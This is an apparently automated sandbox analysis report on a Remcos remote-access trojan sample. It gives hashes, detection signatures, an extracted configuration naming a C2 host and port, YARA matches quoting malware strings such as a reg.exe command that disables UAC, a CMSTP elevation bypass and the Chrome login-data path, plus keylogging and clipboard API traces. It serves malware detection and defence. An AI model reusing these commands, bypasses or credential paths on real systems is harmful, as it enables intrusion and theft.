
Windows Analysis Report
1m70ggeepT.exe

Overview

General Information

Sample name: 1m70ggeepT.exe
renamed because original name is a hash value
Original sample name: 06f5b8dffc6c138828adbc7f29cfc7f0.exe
Analysis ID: 1417365
MD5: 06f5b8dffc6c138828adbc7f29cfc7f0
SHA1: b59ef5d613a1e49c7034c3ee05780ce054ca0054
SHA256: 03ba551339062106448ff58cbc393338483439513ec8439497bf47153e13f4b7
Tags: 32, exe, RemcosRAT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses dynamic DNS services
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 1m70ggeepT.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\1m70ggeepT.exe" MD5: 06F5B8DFFC6C138828ADBC7F29CFC7F0)
    • svcs.exe (PID: 5528 cmdline: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" MD5: 06F5B8DFFC6C138828ADBC7F29CFC7F0)
  • svcs.exe (PID: 5864 cmdline: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" MD5: 06F5B8DFFC6C138828ADBC7F29CFC7F0)
  • svcs.exe (PID: 5324 cmdline: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" MD5: 06F5B8DFFC6C138828ADBC7F29CFC7F0)
  • svcs.exe (PID: 4616 cmdline: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" MD5: 06F5B8DFFC6C138828ADBC7F29CFC7F0)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "leetboy.dynuddns.net:1998:1", "Assigned name": "Remote", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "svcs.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3XK1S0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara matches (Source, Rule, Description, Author, Strings):
Source: 1m70ggeepT.exe | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 1m70ggeepT.exe | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 1m70ggeepT.exe | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
      • 0x6aaa8:$a1: Remcos restarted by watchdog!
      • 0x6b020:$a3: %02i:%02i:%02i:%03i
Source: 1m70ggeepT.exe | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
      • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x64b6c:$str_b2: Executing file:
      • 0x65bec:$str_b3: GetDirectListeningPort
      • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x65718:$str_b7: \update.vbs
      • 0x64b94:$str_b9: Downloaded file:
      • 0x64b80:$str_b10: Downloading file:
      • 0x64c24:$str_b12: Failed to upload file:
      • 0x65bb4:$str_b13: StartForward
      • 0x65bd4:$str_b14: StopForward
      • 0x65670:$str_b15: fso.DeleteFile "
      • 0x65604:$str_b16: On Error Resume Next
      • 0x656a0:$str_b17: fso.DeleteFolder "
      • 0x64c14:$str_b18: Uploaded file:
      • 0x64bd4:$str_b19: Unable to delete:
      • 0x65638:$str_b20: while fso.FileExists("
      • 0x650b1:$str_c0: [Firefox StoredLogins not found]
Source: 1m70ggeepT.exe | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
      • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6497c:$s1: CoGetObject
      • 0x64990:$s1: CoGetObject
      • 0x649ac:$s1: CoGetObject
      • 0x6e938:$s1: CoGetObject
      • 0x6493c:$s2: Elevation:Administrator!new:
Yara matches (Source, Rule, Description, Author, Strings):
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
          • 0x6aaa8:$a1: Remcos restarted by watchdog!
          • 0x6b020:$a3: %02i:%02i:%02i:%03i
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
          • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
          • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x64b6c:$str_b2: Executing file:
          • 0x65bec:$str_b3: GetDirectListeningPort
          • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x65718:$str_b7: \update.vbs
          • 0x64b94:$str_b9: Downloaded file:
          • 0x64b80:$str_b10: Downloading file:
          • 0x64c24:$str_b12: Failed to upload file:
          • 0x65bb4:$str_b13: StartForward
          • 0x65bd4:$str_b14: StopForward
          • 0x65670:$str_b15: fso.DeleteFile "
          • 0x65604:$str_b16: On Error Resume Next
          • 0x656a0:$str_b17: fso.DeleteFolder "
          • 0x64c14:$str_b18: Uploaded file:
          • 0x64bd4:$str_b19: Unable to delete:
          • 0x65638:$str_b20: while fso.FileExists("
          • 0x650b1:$str_c0: [Firefox StoredLogins not found]
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
          • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x6497c:$s1: CoGetObject
          • 0x64990:$s1: CoGetObject
          • 0x649ac:$s1: CoGetObject
          • 0x6e938:$s1: CoGetObject
          • 0x6493c:$s2: Elevation:Administrator!new:
Yara matches (Source, Rule, Description, Author, Strings):
Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
              • 0x134a8:$a1: Remcos restarted by watchdog!
              • 0x13a20:$a3: %02i:%02i:%02i:%03i
Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
(41 further entries not shown)
Yara matches (Source, Rule, Description, Author, Strings):
Source: 6.0.svcs.exe.400000.0.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 6.0.svcs.exe.400000.0.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 6.0.svcs.exe.400000.0.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
                      • 0x6aaa8:$a1: Remcos restarted by watchdog!
                      • 0x6b020:$a3: %02i:%02i:%02i:%03i
Source: 6.0.svcs.exe.400000.0.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
                      • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
                      • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                      • 0x64b6c:$str_b2: Executing file:
                      • 0x65bec:$str_b3: GetDirectListeningPort
                      • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                      • 0x65718:$str_b7: \update.vbs
                      • 0x64b94:$str_b9: Downloaded file:
                      • 0x64b80:$str_b10: Downloading file:
                      • 0x64c24:$str_b12: Failed to upload file:
                      • 0x65bb4:$str_b13: StartForward
                      • 0x65bd4:$str_b14: StopForward
                      • 0x65670:$str_b15: fso.DeleteFile "
                      • 0x65604:$str_b16: On Error Resume Next
                      • 0x656a0:$str_b17: fso.DeleteFolder "
                      • 0x64c14:$str_b18: Uploaded file:
                      • 0x64bd4:$str_b19: Unable to delete:
                      • 0x65638:$str_b20: while fso.FileExists("
                      • 0x650b1:$str_c0: [Firefox StoredLogins not found]
Source: 6.0.svcs.exe.400000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                      • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0x6497c:$s1: CoGetObject
                      • 0x64990:$s1: CoGetObject
                      • 0x649ac:$s1: CoGetObject
                      • 0x6e938:$s1: CoGetObject
                      • 0x6493c:$s2: Elevation:Administrator!new:
(45 further entries not shown)

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1m70ggeepT.exe, ProcessId: 6544, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1m70ggeepT.exe, ProcessId: 6544, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: 41 59 45 C6 0C 23 96 BE 3F 05 D4 C8 42 F3 AE 34 CB A6 C7 29 46 04 E0 10 85 4F BE DE BA 80 4F 5E 3E 19 B2 E3 9F DD 80 6D D2 00 29 D2 4C 47 44 A2 A4 55 68 EB E7 02 B1 FA 6E DB 3C 36 51 D9 34 8A 6B 15 06 34 E4 2D F9 F0 D3 CA D8 DA FB 43 3C 64 22 DF 59 D6 EF 7A B0 20 BF 59 23 FD 42 BF 5D E9 16 39 A3 AD D0 E6 8E 2B , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, ProcessId: 5528, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-3XK1S0\exepath
No Snort rule has matched

AV Detection

Source: 1m70ggeepT.exe | Avira: detected
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C | URL Reputation: Label: phishing
Source: leetboy.dynuddns.net | Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: 00000004.00000002.2147149653.00000000005C7000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "leetboy.dynuddns.net:1998:1", "Assigned name": "Remote", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "svcs.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3XK1S0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: leetboy.dynuddns.net | Virustotal: Detection: 8%
Source: leetboy.dynuddns.net | Virustotal: Detection: 8%
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Virustotal: Detection: 79%
Source: 1m70ggeepT.exe | Virustotal: Detection: 79%
Source: Yara match | File source: 1m70ggeepT.exe, type: SAMPLE
Source: Yara match | File source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Joe Sandbox ML: detected
Source: 1m70ggeepT.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00433837
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_00433837
Source: 1m70ggeepT.exe, 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_d846d862-5

Exploits

Source: Yara match | File source: 1m70ggeepT.exe, type: SAMPLE
Source: Yara match | File source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1967511395.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED

Privilege Escalation

Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_004074FD _wcslen,CoGetObject,0_2_004074FD
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_004074FD _wcslen,CoGetObject,3_2_004074FD
Source: 1m70ggeepT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409253
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C291
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C34D
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409665
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0044E879 FindFirstFileExA,0_2_0044E879
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_0040880C
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040783C FindFirstFileW,FindNextFileW,0_2_0040783C
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419AF5
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB30
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD37
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409253
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C291
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C34D
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409665
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0044E879 FindFirstFileExA,3_2_0044E879
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_0040880C
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040783C FindFirstFileW,FindNextFileW,3_2_0040783C
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419AF5
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB30
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD37
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407C97

Networking

Source: Malware configuration extractor | URLs: leetboy.dynuddns.net
Source: unknown | DNS query: name: leetboy.dynuddns.net
Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 185.196.11.223:1998
Source: Joe Sandbox View | ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0041B380
Source: unknown | DNS traffic detected: queries for: leetboy.dynuddns.net
Source: 1m70ggeepT.exe, svcs.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: 1m70ggeepT.exe, svcs.exe.0.dr | String found in binary or memory: http://geoplugin.net/json.gp/C

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000 | 0_2_0040A2B8
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\microsofts\svcs.exe
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B70E
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004168C1
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004168C1
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B70E
